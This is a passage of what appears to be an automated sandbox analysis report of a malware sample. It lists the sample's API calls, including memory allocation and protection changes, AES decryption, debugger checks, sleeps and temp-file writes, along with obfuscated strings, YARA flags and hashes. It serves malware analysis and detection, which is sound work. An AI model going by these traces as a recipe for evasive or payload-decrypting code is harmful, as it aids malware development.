                                                • SetErrorMode.KERNEL32(00000400,?,?,04B60223,?,?), ref: 04B60E19
                                                • SetErrorMode.KERNEL32(00000000,?,?,04B60223,?,?), ref: 04B60E1E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2880065778.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4b60000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorMode
                                                • String ID:
                                                • API String ID: 2340568224-0
                                                • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                • Instruction ID: a9533732da9d409a3fb09f18c49f1467be2f2023480b02c0cc13f7ac882dbf18
                                                • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                • Instruction Fuzzy Hash: 55D0123154512877D7003A95DC09BCD7B1CDF09B62F008451FB0DD9080C774954046E5
                                                APIs
                                                • RtlAllocateHeap.NTDLL(00000000,00402809,00402805,?,0040AD1B,0040280B,00402805,0042D884,?,?,00403597,?,00402809,00402805), ref: 00413CAB
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2877015392.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Similarity
                                                • API ID: AllocateHeap
                                                • String ID:
                                                • API String ID: 1279760036-0
                                                • Opcode ID: 0317c977ae3de03b4a355117f1d18651feb64bc701aa808cd4791dde922aff94
                                                • Instruction ID: d9d624181c4160d02ab49c773ca7be82655902724fa9057d6622eb650e71da69
                                                • Opcode Fuzzy Hash: 0317c977ae3de03b4a355117f1d18651feb64bc701aa808cd4791dde922aff94
                                                • Instruction Fuzzy Hash: BAE0E53350013057D6213F668C007DB7A4C9F413A2F180167EC18B62D0FA6CCE8141ED
                                                APIs
                                                • RtlAllocateHeap.NTDLL(00000000,10001F83,?,?,10002743,10001F83,?,10001F83,0007A120), ref: 10007A20
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2880988260.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000000.00000002.2880965308.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000000.00000002.2881015345.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000000.00000002.2881069873.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                                Similarity
                                                • API ID: AllocateHeap
                                                • String ID:
                                                • API String ID: 1279760036-0
                                                • Opcode ID: e19d539462f031469c69ea45d1cad77acc71583726438384a09bba2e4039781a
                                                • Instruction ID: 0f7b013f9e5e8caa32c185eac4a395cd376aa25861a87a311eefda30a96e0e36
                                                • Opcode Fuzzy Hash: e19d539462f031469c69ea45d1cad77acc71583726438384a09bba2e4039781a
                                                • Instruction Fuzzy Hash: 2FE0A035B0012266F711EA698C00B8F3A89FB832F0F124120AC489209ADA68DE0181E2
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2877232140.00000000009AE000.00000040.00000001.01000000.00000003.sdmp, Offset: 009AE000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_9ae000_file.jbxd
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID:
                                                • API String ID: 1029625771-0
                                                • Opcode ID: 592404ffb6bdf77800cdf739a80689e9c7e9798cbc47049e7dc8e4eb270d7578
                                                • Instruction ID: bb2d368ff64e4f92e202ab0d622f434293cdef87a23e843ef5bcb5694aa9417a
                                                • Opcode Fuzzy Hash: 592404ffb6bdf77800cdf739a80689e9c7e9798cbc47049e7dc8e4eb270d7578
                                                • Instruction Fuzzy Hash: 98E092B1008B15DFC3143F6AE1945A9FFF8EF44360F52482DE1C986240D23504C1DB17
                                                APIs
                                                • _free.LIBCMT ref: 10005C07
                                                  • Part of subcall function 10007A3C: RtlFreeHeap.NTDLL(00000000,00000000,?,100066F0), ref: 10007A52
                                                  • Part of subcall function 10007A3C: GetLastError.KERNEL32(?,?,100066F0), ref: 10007A64
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2880988260.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000000.00000002.2880965308.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000000.00000002.2881015345.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000000.00000002.2881069873.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                                Similarity
                                                • API ID: ErrorFreeHeapLast_free
                                                • String ID:
                                                • API String ID: 1353095263-0
                                                • Opcode ID: d102fdbbc19008656020672b0513dbd0600b00c460041e1c03a0ef10da910664
                                                • Instruction ID: c87f8b0a48b83a8a7248450826a19003e4aa18d6d81e39a7cffe4d34c565a0dd
                                                • Opcode Fuzzy Hash: d102fdbbc19008656020672b0513dbd0600b00c460041e1c03a0ef10da910664
                                                • Instruction Fuzzy Hash: D9C04C75500208BBDB05DF45DD06A4E7BA9EB812A4F204054F41567291DAB5EF449691
                                                APIs
                                                • VirtualProtect.KERNEL32(?), ref: 00AAD4B1
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2877232140.0000000000AAC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AAC000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aac000_file.jbxd
                                                Similarity
                                                • API ID: ProtectVirtual
                                                • String ID:
                                                • API String ID: 544645111-0
                                                • Opcode ID: 840489e7676759e8cb3284605378cebeb5077e9a9fbd00e61d84db228f84a02c
                                                • Instruction ID: 3478b198c5479c43dba618617aec86a0a29305fd9e04ed11fa9ec6874035a9f6
                                                • Opcode Fuzzy Hash: 840489e7676759e8cb3284605378cebeb5077e9a9fbd00e61d84db228f84a02c
                                                • Instruction Fuzzy Hash: 42C0222000E3E823C3232F300CE8B8EBF000F0B200F080C88E2CA0A8C3CAC02C00C32A
                                                APIs
                                                • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 00F6CE16
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2878196099.0000000000F6C000.00000040.00000020.00020000.00000000.sdmp, Offset: 00F6C000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f6c000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID:
                                                • API String ID: 4275171209-0
                                                • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                • Instruction ID: 3f3e4586b33f5298a25c903518db37b8ba12b8023771e18266d653722ed3c811
                                                • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                • Instruction Fuzzy Hash: A5113F79A00208EFDB01DF98C985E99BBF5AF08750F058094F9889B361D375EA50EF80
                                                APIs
                                                • VirtualAlloc.KERNEL32(?,?,?,?), ref: 00402E3F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2877015392.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID:
                                                • API String ID: 4275171209-0
                                                • Opcode ID: 9b7f6f3ca0983af9e8fdb80d9d56c3a0869d2f15b64f49a49faae6a606d2425e
                                                • Instruction ID: eb79ea19b3e1abf3f5b24c483eecae43203cd8e5c5511bfeef65b24117358006
                                                • Opcode Fuzzy Hash: 9b7f6f3ca0983af9e8fdb80d9d56c3a0869d2f15b64f49a49faae6a606d2425e
                                                • Instruction Fuzzy Hash: 17C0483200020DFBCF025FD1EC048DA7F2AFB09260B00C020FA1844032C773A931ABA5
                                                APIs
                                                • VirtualFree.KERNELBASE(?,?,?), ref: 00402E5C
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2877015392.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Similarity
                                                • API ID: FreeVirtual
                                                • String ID:
                                                • API String ID: 1263568516-0
                                                • Opcode ID: c340e0d22e4fb20872e2675f8e927c09d9f86923da33760a30bf271b1d9be8d1
                                                • Instruction ID: a3fa6bbe5c1a250ebea8c2fc35f655263c95a0ace9f7750fc45cf9fcc5ecde2d
                                                • Opcode Fuzzy Hash: c340e0d22e4fb20872e2675f8e927c09d9f86923da33760a30bf271b1d9be8d1
                                                • Instruction Fuzzy Hash: 5CB0923204020CFBCF025F81EC048D93F6AFB0C261B408020FA1C44031C7339675AB84
                                                APIs
                                                • GetTempPathA.KERNEL32(00000104,?,0042C014,0041F068,00000000), ref: 04B63FF1
                                                • Sleep.KERNEL32(000003E8), ref: 04B64189
                                                • __Init_thread_footer.LIBCMT ref: 04B6475E
                                                • __Init_thread_footer.LIBCMT ref: 04B64924
                                                • SHGetFolderPathA.SHELL32(00000000,00000000,00000000,00000000,?,00000000,?,04B66D08,0041D805,0042DA9C,0042DA9D,?,00000000,00000000,0042DC1C,0042DC1D), ref: 04B64B2E
                                                • __Init_thread_footer.LIBCMT ref: 04B64BBC
                                                • __Init_thread_footer.LIBCMT ref: 04B64E25
                                                • CoInitialize.OLE32(00000000), ref: 04B64EA6
                                                • CoCreateInstance.COMBASE(0041F290,00000000,00000001,0041F260,?), ref: 04B64EC1
                                                • __Init_thread_footer.LIBCMT ref: 04B65324
                                                • Sleep.KERNEL32(00000BB8,00000000,?,04B66CE8,0041D8A0,0042DB20,0042DB21), ref: 04B6553C
                                                • __Init_thread_footer.LIBCMT ref: 04B65632
                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104,?,04B66D08,0041D805,0042DA9C,0042DA9D,?,00000000,00000000,0042DC1C,0042DC1D), ref: 04B64F2F
                                                  • Part of subcall function 04B70A49: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,04B65CE6,00000000,0042C014), ref: 04B70A5E
                                                  • Part of subcall function 04B70A49: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04B70A7D
                                                • __Init_thread_footer.LIBCMT ref: 04B6428D
                                                  • Part of subcall function 04B69EA2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04B69EAC
                                                  • Part of subcall function 04B69EA2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04B69EDF
                                                  • Part of subcall function 04B62457: CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 04B6248D
                                                  • Part of subcall function 04B62457: WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 04B624AE
                                                  • Part of subcall function 04B62457: CloseHandle.KERNEL32(00000000), ref: 04B624B5
                                                • __Init_thread_footer.LIBCMT ref: 04B64469
                                                  • Part of subcall function 04B69EEC: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04B69EF7
                                                  • Part of subcall function 04B69EEC: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04B69F34
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2880065778.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4b60000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Init_thread_footer$CriticalSection$File$CreateEnterLeavePathSleepTime$ByteCharCloseFolderHandleInitializeInstanceMultiSystemTempUnothrow_t@std@@@WideWrite__ehfuncinfo$??2@
                                                • String ID: KDOX$]DFE$^OX*$viFO
                                                • API String ID: 529012138-4238671514
                                                • Opcode ID: d653516d6fcac4cfb1a3aecc6086a08e4b36a7bab3ac3c77805d5c8949ef4ee8
                                                • Instruction ID: 3315045fbb3a34e950b3e62640445f3b3e2ca1b80243ae3fec44e16f3e4b457c
                                                • Opcode Fuzzy Hash: d653516d6fcac4cfb1a3aecc6086a08e4b36a7bab3ac3c77805d5c8949ef4ee8
                                                • Instruction Fuzzy Hash: 6FF213B0E042589FEB24CF24DC48BADBBB1EF45304F1441E8D50A6B291DB79BA85CF59
                                                APIs
                                                • __Init_thread_footer.LIBCMT ref: 04D03426
                                                • __Init_thread_footer.LIBCMT ref: 04D03602
                                                • __Init_thread_footer.LIBCMT ref: 04D038F7
                                                • __Init_thread_footer.LIBCMT ref: 04D03ABD
                                                • __Init_thread_footer.LIBCMT ref: 04D044BD
                                                • __Init_thread_footer.LIBCMT ref: 04D047CB
                                                • __Init_thread_footer.LIBCMT ref: 04D03D55
                                                  • Part of subcall function 04D0FBE2: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04D0FC16
                                                • __Init_thread_footer.LIBCMT ref: 04D03FBE
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000003.2398971584.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, Offset: 04D00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_3_4d00000_file.jbxd
                                                Similarity
                                                • API ID: Init_thread_footer$Unothrow_t@std@@@__ehfuncinfo$??2@
                                                • String ID: KDOX$]DFE$^OX*$viFO
                                                • API String ID: 829385169-4238671514
                                                • Opcode ID: d653516d6fcac4cfb1a3aecc6086a08e4b36a7bab3ac3c77805d5c8949ef4ee8
                                                • Instruction ID: 88129635c1eb5b3cbac3c2365f4df0ed5b7c99a00c2ac15b0ae6a711a23d9b97
                                                • Opcode Fuzzy Hash: d653516d6fcac4cfb1a3aecc6086a08e4b36a7bab3ac3c77805d5c8949ef4ee8
                                                • Instruction Fuzzy Hash: 89F2E1B0E042189BEB24DF24DC58BADBBB1EF05304F5482D8E5096B2D1DB74BA85CF65
                                                APIs
                                                • CryptAcquireContextW.ADVAPI32(?,00000000,?,00000018,F0000000,0042C014), ref: 04B63897
                                                • CryptCreateHash.ADVAPI32(?,0000800C,00000000,00000000,?), ref: 04B638BB
                                                • CryptHashData.ADVAPI32(?,00000000,?,00000000), ref: 04B63925
                                                • GetLastError.KERNEL32 ref: 04B6392F
                                                • CryptDeriveKey.ADVAPI32(?,0000660E,?,00000000,?), ref: 04B63957
                                                • GetLastError.KERNEL32 ref: 04B63961
                                                • CryptReleaseContext.ADVAPI32(?,00000000), ref: 04B63971
                                                • CryptDecrypt.ADVAPI32(?,00000000,00000000,00000000,?,00000000), ref: 04B63A33
                                                • CryptDestroyKey.ADVAPI32(?), ref: 04B63AA5
                                                Strings
                                                • Microsoft Enhanced RSA and AES Cryptographic Provider, xrefs: 04B63873
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2880065778.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4b60000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Crypt$ContextErrorHashLast$AcquireCreateDataDecryptDeriveDestroyRelease
                                                • String ID: Microsoft Enhanced RSA and AES Cryptographic Provider
                                                • API String ID: 3761881897-63410773
                                                • Opcode ID: 40fbdad3a39ca36db9715c34553cb7c87d5092a534739f652b7b7891191c3091
                                                • Instruction ID: 8ed36b872722dda26fb4396a46eea9bdd84ad28f16be1764a5daea6e10f86296
                                                • Opcode Fuzzy Hash: 40fbdad3a39ca36db9715c34553cb7c87d5092a534739f652b7b7891191c3091
                                                • Instruction Fuzzy Hash: 1F816F71A002189FEF248F24CC45B9EBBB5EF49300F1481E9E94EE7291DB35AE859F51
                                                APIs
                                                  • Part of subcall function 04B70A49: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,04B65CE6,00000000,0042C014), ref: 04B70A5E
                                                  • Part of subcall function 04B70A49: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04B70A7D
                                                  • Part of subcall function 04B69EEC: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04B69EF7
                                                  • Part of subcall function 04B69EEC: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04B69F34
                                                • __Init_thread_footer.LIBCMT ref: 04B65324
                                                • Sleep.KERNEL32(00000BB8,00000000,?,04B66CE8,0041D8A0,0042DB20,0042DB21), ref: 04B6553C
                                                • __Init_thread_footer.LIBCMT ref: 04B65632
                                                • Sleep.KERNEL32(000007D0), ref: 04B6599C
                                                • Sleep.KERNEL32(000007D0), ref: 04B659B6
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2880065778.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4b60000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Sleep$CriticalInit_thread_footerSectionTime$EnterFileLeaveSystemUnothrow_t@std@@@__ehfuncinfo$??2@
                                                • String ID: DFEK$updateSW
                                                • API String ID: 3554146954-1114742100
                                                • Opcode ID: 77110f7e8cc78f45bd0e6b43112bb3db69cfffe81fb6a3c2c0fb0262c7cc4dea
                                                • Instruction ID: 5d56a9a702dad2434d98fe4f27fd2356b6d8580b0a4dff25f0eebe2d2d20b32b
                                                • Opcode Fuzzy Hash: 77110f7e8cc78f45bd0e6b43112bb3db69cfffe81fb6a3c2c0fb0262c7cc4dea
                                                • Instruction Fuzzy Hash: C93232B1E002549BEF28DF24DC887ADBBB1EF45304F1442E9D40A6B291DB78AE85CF55
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2877232140.0000000000822000.00000040.00000001.01000000.00000003.sdmp, Offset: 00822000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_822000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: )A~|$6o*4$L-s$_-w2$e:Go$|+}{$|+}{
                                                • API String ID: 0-2970922531
                                                • Opcode ID: ed93b3cbe23dfa3c6fca998295a8051e675e96b7954e6a787f503204a91d1039
                                                • Instruction ID: ff1f0b22cda258ccd4cb6437ca3ea28d996e9bd7fd1642b4c5287d89458e359f
                                                • Opcode Fuzzy Hash: ed93b3cbe23dfa3c6fca998295a8051e675e96b7954e6a787f503204a91d1039
                                                • Instruction Fuzzy Hash: 2DB208F3A0C204AFE304AE2DEC8567ABBE5EFD4360F16863DE6C5C3744E93558058696
                                                APIs
                                                  • Part of subcall function 04D0FBE2: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04D0FC16
                                                • __Init_thread_footer.LIBCMT ref: 04D044BD
                                                • __Init_thread_footer.LIBCMT ref: 04D047CB
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000003.2398971584.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, Offset: 04D00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_3_4d00000_file.jbxd
                                                Similarity
                                                • API ID: Init_thread_footer$Unothrow_t@std@@@__ehfuncinfo$??2@
                                                • String ID: DFEK$U%
                                                • API String ID: 829385169-3435397596
                                                • Opcode ID: 41cbdf90dec37eb52b954d10541310d96c062ecf6e52845e935639f857fb7cc0
                                                • Instruction ID: 01384debf471ce94e14142a97189ff0586a5139a176f32076495f655a9d5bb9b
                                                • Opcode Fuzzy Hash: 41cbdf90dec37eb52b954d10541310d96c062ecf6e52845e935639f857fb7cc0
                                                • Instruction Fuzzy Hash: 78D2F271E002149BEB15EF24DC54BEDBBB5EF40308F5481A9E8096B2D1DB74BA85CFA1
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2877015392.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Similarity
                                                • API ID: __floor_pentium4
                                                • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                • API String ID: 4168288129-2761157908
                                                • Opcode ID: e4a2af43c5bc17daceace0d9627c377d7fa11afa99750231fbf68f24f9a3cb98
                                                • Instruction ID: 71a107362d346717e648338213b5422f70619b5b18563a803cf0c70334ea4234
                                                • Opcode Fuzzy Hash: e4a2af43c5bc17daceace0d9627c377d7fa11afa99750231fbf68f24f9a3cb98
                                                • Instruction Fuzzy Hash: 78D22771E092288FDB65CE28DD407EAB7B5EB44314F1441EAD44DE7240E778AEC58F86
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2877232140.0000000000822000.00000040.00000001.01000000.00000003.sdmp, Offset: 00822000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_822000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 8EHs$:ks-$XXzN$`R-?${~wk
                                                • API String ID: 0-1416664287
                                                • Opcode ID: d2228863ebcee3a975ae74bb3f7dd21cf91f2e7a173475798d627c477342c244
                                                • Instruction ID: 3076d454c07eaa299a94a408148eb2cbfeca5c950a4d25870204de444f3352b9
                                                • Opcode Fuzzy Hash: d2228863ebcee3a975ae74bb3f7dd21cf91f2e7a173475798d627c477342c244
                                                • Instruction Fuzzy Hash: DEB22AF360C2049FE314AE2DEC8567AFBE5EF98320F16463DEAC4D3744EA3558058696
                                                APIs
                                                • IsDebuggerPresent.KERNEL32(?,?,?,?,?,(@), ref: 0040CE9B
                                                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,(@), ref: 0040CEA5
                                                • UnhandledExceptionFilter.KERNEL32(004024E3,?,?,?,?,?,(@), ref: 0040CEB2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2877015392.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Similarity
                                                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                • String ID: (@
                                                • API String ID: 3906539128-3675327911
                                                • Opcode ID: 699cb89c4481d733bc24bc723ff59a4702c04dd7a22af15121b47e74e86c8d00
                                                • Instruction ID: 588a31918c4d7a6a9ba75f52031696ab4f5dbddd8307c033202189b188a5c7dc
                                                • Opcode Fuzzy Hash: 699cb89c4481d733bc24bc723ff59a4702c04dd7a22af15121b47e74e86c8d00
                                                • Instruction Fuzzy Hash: 5E31C475911228ABCB21DF65D8897CDBBB4AF08310F5081EAE40CA7291E7749F858F48
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2877232140.0000000000822000.00000040.00000001.01000000.00000003.sdmp, Offset: 00822000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_822000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: =t?$bsV{$wfE~$d>V
                                                • API String ID: 0-3435156416
                                                • Opcode ID: 444320d33d52adc51038a4c33d04313b936581c647191ecdf9f294d6f6df07ef
                                                • Instruction ID: 54623765bc02f3ba1a3490c70df38e05023355b644e346c6001e0b2d33ecffa0
                                                • Opcode Fuzzy Hash: 444320d33d52adc51038a4c33d04313b936581c647191ecdf9f294d6f6df07ef
                                                • Instruction Fuzzy Hash: 00B2F7F36082009FE314AE2DEC8567AF7EAEFD4720F1A493DE6C4C7744EA3558058696
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2877232140.0000000000822000.00000040.00000001.01000000.00000003.sdmp, Offset: 00822000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_822000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: /F!~$<kN$j-2$qYy
                                                • API String ID: 0-1529775823
                                                • Opcode ID: 1cd8d2f1be65132e940a329f114bf40fe38418de8f08dc5bc5670d266ebe5a53
                                                • Instruction ID: 708029d9ebb47d7aa50816a774c186fa7043e1aca736bcedd4e10b5b0aafc76f
                                                • Opcode Fuzzy Hash: 1cd8d2f1be65132e940a329f114bf40fe38418de8f08dc5bc5670d266ebe5a53
                                                • Instruction Fuzzy Hash: 53A2F4F360C2049FE3046E2DEC8577ABBE9EB94320F1A493DEAC5C3744EA7558058697
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2877015392.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 257df63f9c0a8af9516efd39e7f9a4a8ebb064806e5099792f7b0849a0375d65
                                                • Instruction ID: 1698085c936ca5c6c6a57ee88efec3ce2b030c017204745a192f91a5fd5d0df0
                                                • Opcode Fuzzy Hash: 257df63f9c0a8af9516efd39e7f9a4a8ebb064806e5099792f7b0849a0375d65
                                                • Instruction Fuzzy Hash: 8A025C71E002199BDF14CFA9D9806EEBBF1FF48314F24826AE919E7341D775A9818B84
                                                Memory Dump Source
                                                • Source File: 00000000.00000003.2398971584.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, Offset: 04D00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_3_4d00000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 257df63f9c0a8af9516efd39e7f9a4a8ebb064806e5099792f7b0849a0375d65
                                                • Instruction ID: 6c2d7a8c146462ba5a324ea9cfa0bf9606b88200bf4d53bcd6c6f7975e9f1e9e
                                                • Opcode Fuzzy Hash: 257df63f9c0a8af9516efd39e7f9a4a8ebb064806e5099792f7b0849a0375d65
                                                • Instruction Fuzzy Hash: 70024E71E00219ABDB15DFA8D8807AEBBF1FF48314F248269D919EB391D731A945CB90
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2880065778.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4b60000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 257df63f9c0a8af9516efd39e7f9a4a8ebb064806e5099792f7b0849a0375d65
                                                • Instruction ID: ea05933711f035f349ee2608478a8b5ca9dd532ccce191208800c4f7af44965c
                                                • Opcode Fuzzy Hash: 257df63f9c0a8af9516efd39e7f9a4a8ebb064806e5099792f7b0849a0375d65
                                                • Instruction Fuzzy Hash: 6A022E71E012199FDF14DFA8C9806ADFBB5FF48314F2486AAD929EB340D731A941CB90
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2877232140.0000000000822000.00000040.00000001.01000000.00000003.sdmp, Offset: 00822000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_822000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: R/V$vig$wD_O$|_
                                                • API String ID: 0-900146328
                                                • Opcode ID: cd72ef09501c6eeb53dcf2234f18fac89825d24475af8b6a57457f32d11beaa2
                                                • Instruction ID: 79f455b5f8fd2092fce05db49e5af1c5e4547c901becc7e81fe4fc81213bd969
                                                • Opcode Fuzzy Hash: cd72ef09501c6eeb53dcf2234f18fac89825d24475af8b6a57457f32d11beaa2
                                                • Instruction Fuzzy Hash: A792E6F390C2009FE704AE29EC8576AB7E9EF94720F16893DEAC4D3744E63598058797
                                                APIs
                                                • IsProcessorFeaturePresent.KERNEL32(00000017,12041A13), ref: 0040A556
                                                • IsDebuggerPresent.KERNEL32 ref: 0040A622
                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0040A642
                                                • UnhandledExceptionFilter.KERNEL32(?), ref: 0040A64C
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2877015392.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Similarity
                                                • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                • String ID:
                                                • API String ID: 254469556-0
                                                • Opcode ID: b44e0052ca5400530e688fbbb916524e737d0e21bc499905028a740eb104beb1
                                                • Instruction ID: 8b01d550a0a2fff4667565f177a0bd7aa15c2cc699040a0714bae659939ad5a8
                                                • Opcode Fuzzy Hash: b44e0052ca5400530e688fbbb916524e737d0e21bc499905028a740eb104beb1
                                                • Instruction Fuzzy Hash: 40311A75D0531CDBDB10DFA5D9897CDBBB8BF08304F1080AAE409A7290EB759A858F49
                                                APIs
                                                • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 10002FE6
                                                • IsDebuggerPresent.KERNEL32 ref: 100030B2
                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 100030D2
                                                • UnhandledExceptionFilter.KERNEL32(?), ref: 100030DC
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2880988260.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
